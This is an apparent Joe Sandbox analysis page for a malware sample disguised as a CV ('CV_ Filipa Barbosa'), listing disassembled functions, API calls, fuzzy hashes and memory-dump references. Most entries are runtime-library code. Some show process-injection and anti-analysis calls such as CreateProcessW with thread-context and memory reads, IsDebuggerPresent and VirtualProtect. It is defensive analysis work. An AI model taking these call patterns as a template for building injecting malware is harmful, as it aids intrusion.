Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 08dac4327a64b56d730f0625fec3f821c21ff412eed00e1f56839e1fd529d101
Instruction ID: 9cae3b91fd21a6cb3ddaebee8f7809ad9154c7ca7962b920837f30dadd36bd68
Opcode Fuzzy Hash: 08dac4327a64b56d730f0625fec3f821c21ff412eed00e1f56839e1fd529d101
Instruction Fuzzy Hash: 2671CCB89112458A8717EF6AA8B4595BBECFB9934CBE04B2ED309CB7B1DB304414CF54

Function 00350828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 003508FD

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

_wcscpy.LIBCMT ref: 0035098C

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: c87bc9172d307c6fd623c9b8214e6d1b304f60af8fae97e2a9317af251409b42
Instruction ID: 38d440206661ea414a260415dbee6bad082482f65bbf29a662792dd6783f5b44
Opcode Fuzzy Hash: c87bc9172d307c6fd623c9b8214e6d1b304f60af8fae97e2a9317af251409b42
Instruction Fuzzy Hash: B8913534A00604DFCB19DF28C491DA9B7E5EF49311B5580AAEC5A8F7A2DB31ED55CF80

Function 002F3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 002F3A73

Part of subcall function 00311405: __lock.LIBCMT ref: 0031140B

Part of subcall function 002F3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002F3AF3
Part of subcall function 002F3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002F3B08

Part of subcall function 002F3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,002F3AA3,?), ref: 002F3D45
Part of subcall function 002F3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,002F3AA3,?), ref: 002F3D57
Part of subcall function 002F3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,003B1148,003B1130,?,?,?,?,002F3AA3,?), ref: 002F3DC8
Part of subcall function 002F3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,002F3AA3,?), ref: 002F3E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002F3AB3

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: a6d1e07af7089b979aa780024fa2bd8373da418e412f8f228b9d7c277af379a9
Instruction ID: e77cb7e54332861a28fbeb8c13fdcdea7b99f35a3a301c19a870011c187a7326
Opcode Fuzzy Hash: a6d1e07af7089b979aa780024fa2bd8373da418e412f8f228b9d7c277af379a9
Instruction Fuzzy Hash: 7911AC719083409BC302EF2AEC4595BFBF8EF94758F008A1EF685872B1DB709595CB92

Function 0031E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0031EA29
__close_nolock.LIBCMT ref: 0031EA42

Part of subcall function 00317BDA: __getptd_noexit.LIBCMT ref: 00317BDA

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 7003233371d91073293cdc6da2debce52f6d1bf307200ebcc5d933e5cb153561
Instruction ID: 41fe7e3da9a455d2513b86af8875f0245a34712317c1bc696c579a643171d8fc
Opcode Fuzzy Hash: 7003233371d91073293cdc6da2debce52f6d1bf307200ebcc5d933e5cb153561
Instruction Fuzzy Hash: AC11A9729096108ED71FBF68C8427DD7A616F8D335F1A4340E9215F1E2C7B58DC0DAA1

Function 0030F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0031395C: __FF_MSGBANNER.LIBCMT ref: 00313973
Part of subcall function 0031395C: __NMSG_WRITE.LIBCMT ref: 0031397A
Part of subcall function 0031395C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001,00000001,00000000,?,?,0030F507,?,0000000E), ref: 0031399F

std::exception::exception.LIBCMT ref: 0030F51E
__CxxThrowException@8.LIBCMT ref: 0030F533

Part of subcall function 00316805: RaiseException.KERNEL32(?,?,0000000E,003A6A30,?,?,?,0030F538,0000000E,003A6A30,?,00000001), ref: 00316856

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 579886d11c116d4e910d2af440a04133fe3bc19a8253dca51c37ef4604be6e26
Instruction ID: 5a95a58689d968e6417d3eb55f9015459a74f842c210856f9adb312ef1d344c5
Opcode Fuzzy Hash: 579886d11c116d4e910d2af440a04133fe3bc19a8253dca51c37ef4604be6e26
Instruction Fuzzy Hash: 87F0283110021D6BCB2BBFA8DC229EE77ACAF05314F608035F908E64C1CFB0D78482A5

Function 003135E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

__lock_file.LIBCMT ref: 00313629

Part of subcall function 00314E1C: __lock.LIBCMT ref: 00314E3F

__fclose_nolock.LIBCMT ref: 00313634

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 5cb268ce9bad39ee8e9919504ed6ed5a12d928bcab07b7db2ec3f0bc18c3bc4f
Instruction ID: a8abbc15b726ae698ec9a7558b13bbf61be4d3fea44a812c1492d394f4d33a86
Opcode Fuzzy Hash: 5cb268ce9bad39ee8e9919504ed6ed5a12d928bcab07b7db2ec3f0bc18c3bc4f
Instruction Fuzzy Hash: A7F0BB71905604AAD71B7B6588437DEBAA05F49730F258208E460AF2C1C77C86C19F65

Function 013749DD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0137519B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01375231
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01375253

Memory Dump Source

Source File: 00000000.00000002.1771378123.0000000001373000.00000040.00000020.00020000.00000000.sdmp, Offset: 01373000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1373000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: c35006d4da473eaa1d66071fd4c1d71831f6641802d2c82ccf0a0a8d31974866
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: C712CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 002FE8A0 Relevance: 1.7, APIs: 1, Instructions: 199windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FE959

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 4e61f1ac9ca9ce2b202778fd0b3b8bedc0d30de4525f54711859b904e2860296
Instruction ID: 165ad0762fe189c27f8cdbb755e9a558560edb7e674dc420ad885af00c38df36
Opcode Fuzzy Hash: 4e61f1ac9ca9ce2b202778fd0b3b8bedc0d30de4525f54711859b904e2860296
Instruction Fuzzy Hash: C17118708093858FEF37CF24C89476ABBD4BB15348F094A7EDA858F2A5D3759885CB42

Function 00312957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00312A0B

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 6932419454a47ba55e860703015e9538c5c49f1509deccd7653af19c39028f74
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: 574174717007069FDF2E8E69C8815EF77A6AF4C360B25852DE855CB240EB70DDE18B94

Function 0030ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0030EDC7

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 6a2d7f381c84591c27690b6b4b3824731fba8ce612274dd073da190c60ac5717
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: C831E971B02106DFC71ADF58C4A0969FBB6FF49340B658AA5E409CB695DB30EDC1CB80

Function 0035040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00350519

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1ecde4fcd00426e4edf754c3fe6a250616c74c38f66fc5e2e0b3fa79503c3d8e
Instruction ID: 6a14a2adbb63092816f85af76052ef0e9aff291ea91077d7acac3eba25f37690
Opcode Fuzzy Hash: 1ecde4fcd00426e4edf754c3fe6a250616c74c38f66fc5e2e0b3fa79503c3d8e
Instruction Fuzzy Hash: 1F31C275104528CFCB06EF10C095A6E77B4FF49321F20884AEE951F3A6E771A909CF81

Function 00369A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00369A80

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1e7fbe2a2fbd58962e3d51b1566f2d7a8c7b6efae0c36cacd83b862151f9f179
Instruction ID: 031a26e26a056477483978a3ff744ee6d9b9d227c81dc622fd592244be6acc2c
Opcode Fuzzy Hash: 1e7fbe2a2fbd58962e3d51b1566f2d7a8c7b6efae0c36cacd83b862151f9f179
Instruction Fuzzy Hash: 15415D705056018FDB26DF18C494B1ABBF0BF45304F1989ACE99A4B7A2C372F885CF52

Function 002F41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 002F4214: FreeLibrary.KERNEL32(00000000,?), ref: 002F4247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002F39FE,?,00000001), ref: 002F41DB

Part of subcall function 002F4291: FreeLibrary.KERNEL32(00000000), ref: 002F42C4

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: e009796b9e9efb88941e12d5a3cdabbee290b9b9d51352fa29177cd9a3a63b6a
Instruction ID: 744cbcbd4f70810b175db2102cea6600adb813546c7b7de1866aa8e3add4442f
Opcode Fuzzy Hash: e009796b9e9efb88941e12d5a3cdabbee290b9b9d51352fa29177cd9a3a63b6a
Instruction Fuzzy Hash: 1B11C831620209AADB11BB64DC16FAFB7A59F40740F108439FA56AA1C5DBF49A509F50

Function 00369B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00369B51

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 4f70593c10e37c05cade7d448e0acbd04590b62c82168336f4f9f417f9165485
Instruction ID: 555a6201c422633c91fd56595f2ac3d92f492f749a06b1cb099458e3a6d0470f
Opcode Fuzzy Hash: 4f70593c10e37c05cade7d448e0acbd04590b62c82168336f4f9f417f9165485
Instruction Fuzzy Hash: 6D215770509701CFDB26DF68C464B2ABBF1BF85304F15496CE69A4B6A2C732E845CF52

Function 0031AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0031AFC0

Part of subcall function 00317BDA: __getptd_noexit.LIBCMT ref: 00317BDA

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 4c96b4df57c51e0e909d6e42da56acb28980f0ce312ac4b7b376b7004b3f0590
Instruction ID: de40f742ca4e7b9c6d2b704d9aeecba1e2d11ff2657c797e781eb21cfd345115
Opcode Fuzzy Hash: 4c96b4df57c51e0e909d6e42da56acb28980f0ce312ac4b7b376b7004b3f0590
Instruction Fuzzy Hash: 20116D728096009FD71B6FA4C8427DABA60AF8D336F1A4340E4745F1E2C7B489C08BA1

Function 002F39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
Instruction ID: a6c25c2997820c8f371356e5f9e8ac881b12220c8c91672b27052be2335e4027
Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
Instruction Fuzzy Hash: 5301817151010DAECF05EFA4C8928FFFB74AF24344F00C03ABA26971A5EA709A59CF60

Function 00312AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00312AED

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: cacd0098af1e6cdbc9e51dd135b91fd3e30fca9130251cbc6611c00df040c5ef
Instruction ID: dee157fcee4b4a8bb2103126b7d3bbf53b04008ad6d8ef0a03078f9b7d341db8
Opcode Fuzzy Hash: cacd0098af1e6cdbc9e51dd135b91fd3e30fca9130251cbc6611c00df040c5ef
Instruction Fuzzy Hash: B0F06D31900205AADF2FAFB98C067DF7AA5BF08320F198515F4149E191DB788AF2DB91

Function 002F4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,002F39FE,?,00000001), ref: 002F4286

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b025484d20b33510c97f649461b339a37139ea3495ab26a5b7748fc7444d7f53
Instruction ID: 4fc5fd4ec0b8f07b97f86c6acc064af1315263ec1ea5964427ccc6f2b636db78
Opcode Fuzzy Hash: b025484d20b33510c97f649461b339a37139ea3495ab26a5b7748fc7444d7f53
Instruction Fuzzy Hash: 19F01C71525706CFCB35AF64D490827FBE5BF043653248A3EF6D682610C7B19890DF50

Function 002F40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002F40C6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 3381ad4ae02c583c3de844aea28c5cde206ef90d78034986c7e863036f1a3930
Instruction ID: b4075ce160ffbe6ff373c2c231aa3fae778fa6444bae947e4c365dc5638ca340
Opcode Fuzzy Hash: 3381ad4ae02c583c3de844aea28c5cde206ef90d78034986c7e863036f1a3930
Instruction Fuzzy Hash: 0BE0CD365001245BC7129654CC46FFA77ADDF8C790F050175F909E7244D97499C18A90

Function 013759E0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 013759F1

Memory Dump Source

Source File: 00000000.00000002.1771378123.0000000001373000.00000040.00000020.00020000.00000000.sdmp, Offset: 01373000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1373000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2f2e28edef6038d7b6696d6f4b9c826114aaaf75db42de358b7600e5480de424
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: F2E0E67594020DDFDB00EFB4D54969E7FB4EF04301F100161FD05D2281D6309D508A62

Non-executed Functions

